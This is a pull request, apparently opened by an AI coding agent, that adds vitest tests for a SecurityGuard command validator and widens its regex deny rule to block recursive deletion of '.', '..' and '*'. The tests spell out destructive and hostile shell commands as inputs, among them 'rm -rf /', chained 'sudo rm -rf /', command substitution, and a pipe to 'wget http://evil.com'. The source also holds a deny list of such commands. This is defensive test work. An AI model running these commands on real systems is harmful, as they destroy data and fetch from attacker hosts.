### PR TITLE
test(security): enhance SecurityGuard tests and block dangerous relative paths

### DIFF
--- a/src/utils/security.test.ts
+++ b/src/utils/security.test.ts
@@ -3,37 +3,89 @@ import { describe, expect, it } from "vitest";
 import { SecurityGuard } from "./security";
 
 describe("SecurityGuard", () => {
-  it("allows paths inside the workspace root", () => {
-    const guard = new SecurityGuard("/workspace/root");
-    const resolved = guard.validatePath("subdir/file.txt");
-    expect(resolved).toBe(path.resolve("/workspace/root", "subdir/file.txt"));
+  describe("validatePath", () => {
+    it("allows paths inside the workspace root", () => {
+      const guard = new SecurityGuard("/workspace/root");
+      const resolved = guard.validatePath("subdir/file.txt");
+      expect(resolved).toBe(path.resolve("/workspace/root", "subdir/file.txt"));
+    });
+
+    it("blocks paths outside the workspace root", () => {
+      const guard = new SecurityGuard("/workspace/root");
+      expect(() => guard.validatePath("../outside")).toThrow(
+        /outside the allowed workspace/,
+      );
+    });
+
+    it("allows absolute paths when allowAbsolute is true", () => {
+      const guard = new SecurityGuard("/workspace/root");
+      const resolved = guard.validatePath("/tmp/file.txt", true);
+      expect(resolved).toBe("/tmp/file.txt");
+    });
   });
 
-  it("blocks paths outside the workspace root", () => {
+  describe("validateCommand", () => {
     const guard = new SecurityGuard("/workspace/root");
-    expect(() => guard.validatePath("../outside")).toThrow(
-      /outside the allowed workspace/,
-    );
-  });
 
-  it("allows absolute paths when allowAbsolute is true", () => {
-    const guard = new SecurityGuard("/workspace/root");
-    const resolved = guard.validatePath("/tmp/file.txt", true);
-    expect(resolved).toBe("/tmp/file.txt");
-  });
+    it("blocks dangerous shell commands (root deletion)", () => {
+      expect(() => guard.validateCommand("rm -rf /")).toThrow(/blocked pattern/);
+    });
 
-  it("blocks dangerous shell commands", () => {
-    const guard = new SecurityGuard("/workspace/root");
-    expect(() => guard.validateCommand("rm -rf /")).toThrow(
-      /blocked pattern/,
-    );
-    expect(() => guard.validateCommand("curl https://example.com")).toThrow(
-      /blocked pattern/,
-    );
-  });
+    it("blocks curl/wget", () => {
+      expect(() => guard.validateCommand("curl https://example.com")).toThrow(/blocked pattern/);
+      expect(() => guard.validateCommand("wget https://example.com")).toThrow(/blocked pattern/);
+    });
 
-  it("allows benign shell commands", () => {
-    const guard = new SecurityGuard("/workspace/root");
-    expect(() => guard.validateCommand("echo safe")).not.toThrow();
+    it("allows benign shell commands", () => {
+      expect(() => guard.validateCommand("echo safe")).not.toThrow();
+    });
+
+    it("blocks commands with leading/trailing whitespace", () => {
+      expect(() => guard.validateCommand("  rm -rf /  ")).toThrow(/blocked pattern/);
+    });
+
+    it("blocks chained commands with &&", () => {
+      expect(() => guard.validateCommand("echo safe && rm -rf /")).toThrow(/blocked pattern/);
+    });
+
+    it("blocks chained commands with ;", () => {
+      expect(() => guard.validateCommand("echo safe; sudo rm -rf /")).toThrow(/blocked pattern/);
+    });
+
+    it("blocks chained commands with |", () => {
+      expect(() => guard.validateCommand("echo safe | wget http://evil.com")).toThrow(/blocked pattern/);
+    });
+
+    it("blocks commands with extra internal whitespace", () => {
+       expect(() => guard.validateCommand("rm    -rf    /")).toThrow(/blocked pattern/);
+    });
+
+    it("blocks commands inside quotes", () => {
+      expect(() => guard.validateCommand('bash -c "rm -rf /"')).toThrow(/blocked pattern/);
+    });
+
+    it("blocks command substitution", () => {
+      expect(() => guard.validateCommand("echo $(rm -rf /)")).toThrow(/blocked pattern/);
+    });
+
+    it("blocks recursive deletion of current directory", () => {
+        expect(() => guard.validateCommand("rm -rf .")).toThrow(/blocked pattern/);
+        expect(() => guard.validateCommand("rm -rf ./")).toThrow(/blocked pattern/);
+    });
+
+    it("blocks recursive deletion of parent directory", () => {
+        expect(() => guard.validateCommand("rm -rf ..")).toThrow(/blocked pattern/);
+        expect(() => guard.validateCommand("rm -rf ../")).toThrow(/blocked pattern/);
+    });
+
+    it("blocks recursive deletion of wildcard", () => {
+        expect(() => guard.validateCommand("rm -rf *")).toThrow(/blocked pattern/);
+    });
+
+    it("allows safe recursive deletion", () => {
+        expect(() => guard.validateCommand("rm -rf ./src")).not.toThrow();
+        expect(() => guard.validateCommand("rm -rf build")).not.toThrow();
+        expect(() => guard.validateCommand("rm -rf .git")).not.toThrow();
+    });
   });
 });

--- a/src/utils/security.ts
+++ b/src/utils/security.ts
@@ -10,7 +10,7 @@ export class SecurityGuard {
   private allowedCommands: RegExp[] | null = null; // null means all allowed except blocked
   private blockedCommands: RegExp[] = [
     // Dangerous system modification
-    /\brm\s+(-r|-f|-rf|-fr)\s+\//, // rm -rf /
+    /\brm\s+(-r|-f|-rf|-fr)\s+(\/|(\.|\.\.|\*)(\/)?(\s|$))/, // rm -rf /, ., .., *
     /\bmkfs/, // format disk
     /\bdd\b/, // low-level copy
     /\bchown\b/, // change ownership


### PR DESCRIPTION
This PR improves the robustness of the `SecurityGuard` utility by adding comprehensive test coverage for command validation. It identifies and fixes security gaps where `rm -rf .`, `rm -rf ..`, and `rm -rf *` were previously allowed. The update includes a refined regex pattern to block these specific dangerous commands while preserving the ability to use safe relative paths.

---
*PR created automatically by Jules for task [2092517029063179201](https://jules.google.com/task/2092517029063179201) started by @hughlv*